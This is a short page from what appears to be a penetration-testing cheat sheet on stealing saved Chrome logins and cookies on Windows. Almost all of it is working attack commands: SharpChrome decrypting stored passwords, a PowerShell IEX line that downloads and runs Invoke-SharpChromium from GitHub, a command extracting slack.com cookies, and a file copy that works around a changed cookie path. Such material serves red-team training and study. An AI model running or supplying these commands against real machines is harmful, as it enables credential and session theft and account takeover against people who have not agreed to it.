Retrieving Saved Credentials from Chrome windows

Users often store credentials in their browsers for applications that they frequently visit.
- We can use a tool such as SharpChrome to retrieve cookies and saved logins from Google Chrome.

.\SharpChrome.exe logins /unprotect

Extract Cookies

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')

Invoke-SharpChromium -Command "cookies slack.com"

We got an error because the cookie file path that contains the database is hardcoded in SharpChromium, and the current version of Chrome uses a different location.

copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"

Invoke-SharpChromium -Command "cookies slack.com"

PreviousCmdkey Saved Credentials NextExtracting KeePass Hash

Last updated 1 year ago

hashtagExtract Cookies

Extract Cookies